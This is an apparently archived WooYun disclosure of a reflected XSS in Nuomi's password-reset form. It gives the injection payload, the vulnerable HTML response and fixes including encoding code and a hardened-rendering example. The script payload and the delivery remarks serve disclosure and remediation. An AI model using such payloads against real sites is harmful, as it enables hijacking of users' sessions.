WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online viewer --------------- http://drop.zone.ci/
2011-04-26: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed.
2011-04-27: Vendor has actively ignored the vulnerability; details disclosed to the public.
Nuomi (糯米网) has a reflected XSS vulnerability caused by a hidden form field whose value is reflected back without validation or encoding. An attacker who gets a victim to submit the payload can run script in the victim's session and, if the session cookie is readable from script (no HttpOnly flag), steal the user's cookie.
The normal user password-reset page:
The hidden field identifyingName of the form resetForm is reflected unencoded, giving a reflected XSS. Note that the form is submitted with POST, so delivering the payload needs a page that auto-submits a form to the victim rather than a plain link (the report does not test whether the endpoint also accepts the parameter via GET).
<form id="resetForm" action="/user/passwordRetrieve/getRetrieve" method="post">
  <div class="field email">
    <label for="email">Email/手机:</label>
    <div class="input-area">
      <p>
        <input type="text" class="input-txt" id="email" name="emobile" value="" />
      </p>
      <p class="tip">您用来登录的Email地址或手机号码</p>
    </div>
    <span class="msg" id="msgEmail"></span>
  </div>
  <div class="field icode">
    <label for="icode">验证码:</label>
    <div class="input-area">
      <input type="hidden" name="identifyingName" value="vphtg" id="identifyingCodeValue" tabindex="3" />
      <p>
        <input type="text" class="input-txt" id="icode" name="code" />
        <img src="/identifyingCode/vphtg" id="identifyingCodeImg" onclick="var rdm = ('' + Math.random()).replace('\.',''); $('#identifyingCodeImg').attr('src','http://www.nuomi.com/identifyingCode/' + rdm);$('#identifyingCodeValue').val(rdm);" />
        <a href="javascript:;" onclick="var rdm = ('' + Math.random()).replace('\.',''); $('#identifyingCodeImg').attr('src','http://www.nuomi.com/identifyingCode/' + rdm);$('#identifyingCodeValue').val(rdm);">看不清楚?换一张</a>
      </p>
    </div>
    <span class="msg" id="msgICode"></span>
  </div>
  <div class="reset-btn">
    <input type="submit" class="input-btn big-blue" value="重设密码" />
  </div>
</form>
Set identifyingName to the following value
"'/><script>alert('XSS')</script>
and submit the form. The response page:
Page source (the value is reflected twice: inside the hidden input's value attribute and inside the path of the img src):
<form id="resetForm" action="/user/passwordRetrieve/getRetrieve" method="post">
  <div class="field email">
    <label for="email">Email/手机:</label>
    <div class="input-area">
      <p>
        <input type="text" class="input-txt" id="email" name="emobile" value="" />
      </p>
      <p class="tip">您用来登录的Email地址或手机号码</p>
    </div>
    <span class="msg" id="msgEmail"><em class="error">请填写Email或手机号</em></span>
  </div>
  <div class="field icode">
    <label for="icode">验证码:</label>
    <div class="input-area">
      <input type="hidden" name="identifyingName" value=""'/><script>alert('XSS')</script>" id="identifyingCodeValue" tabindex="3" />
      <p>
        <input type="text" class="input-txt" id="icode" name="code" />
        <img src="/identifyingCode/"'/><script>alert('XSS')</script>" id="identifyingCodeImg" onclick="var rdm = ('' + Math.random()).replace('\.',''); $('#identifyingCodeImg').attr('src','http://www.nuomi.com/identifyingCode/' + rdm);$('#identifyingCodeValue').val(rdm);" />
        <a href="javascript:;" onclick="var rdm = ('' + Math.random()).replace('\.',''); $('#identifyingCodeImg').attr('src','http://www.nuomi.com/identifyingCode/' + rdm);$('#identifyingCodeValue').val(rdm);">看不清楚?换一张</a>
      </p>
    </div>
    <span class="msg" id="msgICode"></span>
  </div>
  <div class="reset-btn">
    <input type="submit" class="input-btn big-blue" value="重设密码" />
  </div>
</form>
Filter or escape the input, especially the characters
' " < > % ( ) # &
and their encoded variants. For example:
<, > can be escaped as &lt;, &gt;
(, ) can be escaped as &#40;, &#41;
#, & can be escaped as &#35;, &#38;
The encoding must match the output context: the value above lands in an HTML attribute and in a URL path segment, which need HTML-attribute encoding and URL encoding respectively. Because identifyingName is a server-generated captcha token ("vphtg" in the captured page, digits from Math.random() after a refresh), the simplest fix is to reject any submitted value that is not a short alphanumeric token and issue a fresh one.
In ASP/ASP.NET, you can use:
Server.HTMLEncode(string)
In Java, you can use (this is the HTMLEncode routine from Java Practices; it needs java.text.StringCharacterIterator):
import java.text.StringCharacterIterator;

public static String HTMLEncode(String aTagFragment) {
    final StringBuffer result = new StringBuffer();
    final StringCharacterIterator iterator = new StringCharacterIterator(aTagFragment);
    char character = iterator.current();
    while (character != StringCharacterIterator.DONE) {
        if (character == '<') {
            result.append("&lt;");
        } else if (character == '>') {
            result.append("&gt;");
        } else if (character == '\"') {
            result.append("&quot;");
        } else if (character == '\'') {
            result.append("&#39;");
        } else if (character == '\\') {
            result.append("&#92;");
        } else if (character == '&') {
            result.append("&amp;");
        } else {
            // Not a special character: copy it through unchanged.
            result.append(character);
        }
        character = iterator.next();
    }
    return result.toString();
}
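The following is an added example written for this page; it is not code from the WooYun report or from nuomi.com. It models the captcha part of the reset form as a small server-side template: first rendered the way the captured page behaves (the posted identifyingName copied straight into the hidden input's value and the img src), then with the two fixes described above, an allowlist check on the token and per-context encoding. The payload and field names are the report's; the token alphabet, the htmlEncode/isValidToken helpers and the fallback token are assumptions made for the example.

```javascript
// Added example, not the report's or the vendor's code.
// Payload exactly as submitted in the report.
const PAYLOAD = `"'/><script>alert('XSS')</script>`;

// HTML attribute/text encoding for the characters that can close a quoted
// attribute value, start a tag, or start an entity.
function htmlEncode(s) {
  const map = {
    '&': '&amp;', '<': '&lt;', '>': '&gt;',
    '"': '&quot;', "'": '&#39;', '/': '&#47;',
  };
  return String(s).replace(/[&<>"'\/]/g, (c) => map[c]);
}

// The captcha token is server-generated: "vphtg" in the captured page and a
// run of digits from Math.random() after a refresh. Anything outside a short
// alphanumeric token is rejected. (Exact alphabet/length is an assumption.)
const TOKEN_RE = /^[A-Za-z0-9]{1,32}$/;
function isValidToken(s) {
  return TOKEN_RE.test(String(s));
}

// Vulnerable rendering: raw reflection into two contexts, as in the report.
function renderVulnerable(identifyingName) {
  return (
    `<input type="hidden" name="identifyingName" value="${identifyingName}" id="identifyingCodeValue" />` +
    `<img src="/identifyingCode/${identifyingName}" id="identifyingCodeImg" />`
  );
}

// Hardened rendering: validate first and fall back to a fresh server token,
// then encode for each output context (HTML attribute vs. URL path segment).
// Either layer alone blocks this payload; keeping both means a future token
// format change cannot silently reopen the bug.
function renderHardened(identifyingName, freshToken) {
  const token = isValidToken(identifyingName) ? identifyingName : freshToken;
  return (
    `<input type="hidden" name="identifyingName" value="${htmlEncode(token)}" id="identifyingCodeValue" />` +
    `<img src="/identifyingCode/${encodeURIComponent(token)}" id="identifyingCodeImg" />`
  );
}

// Crude tester's check on a response body: did the reflected value open a
// new script tag? A real test loads the page in a browser, but this is
// enough to compare the two renderings.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Demo run.
console.log('vulnerable:', renderVulnerable(PAYLOAD));
console.log('  script tag present:', containsScriptTag(renderVulnerable(PAYLOAD)));
console.log('hardened:  ', renderHardened(PAYLOAD, 'abc12'));
console.log('  script tag present:', containsScriptTag(renderHardened(PAYLOAD, 'abc12')));
console.log('encoded payload:', htmlEncode(PAYLOAD));
```

Run it with `node` and compare the two renderings: the vulnerable one contains a live `<script>` element in both positions, the hardened one carries the replacement token because the payload fails the allowlist, and the encoded form of the payload shows what the attribute would contain if only output encoding were applied.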
Vendor could not be contacted, or the vendor actively declined.
Vulnerability Rank: 3 (WooYun rating)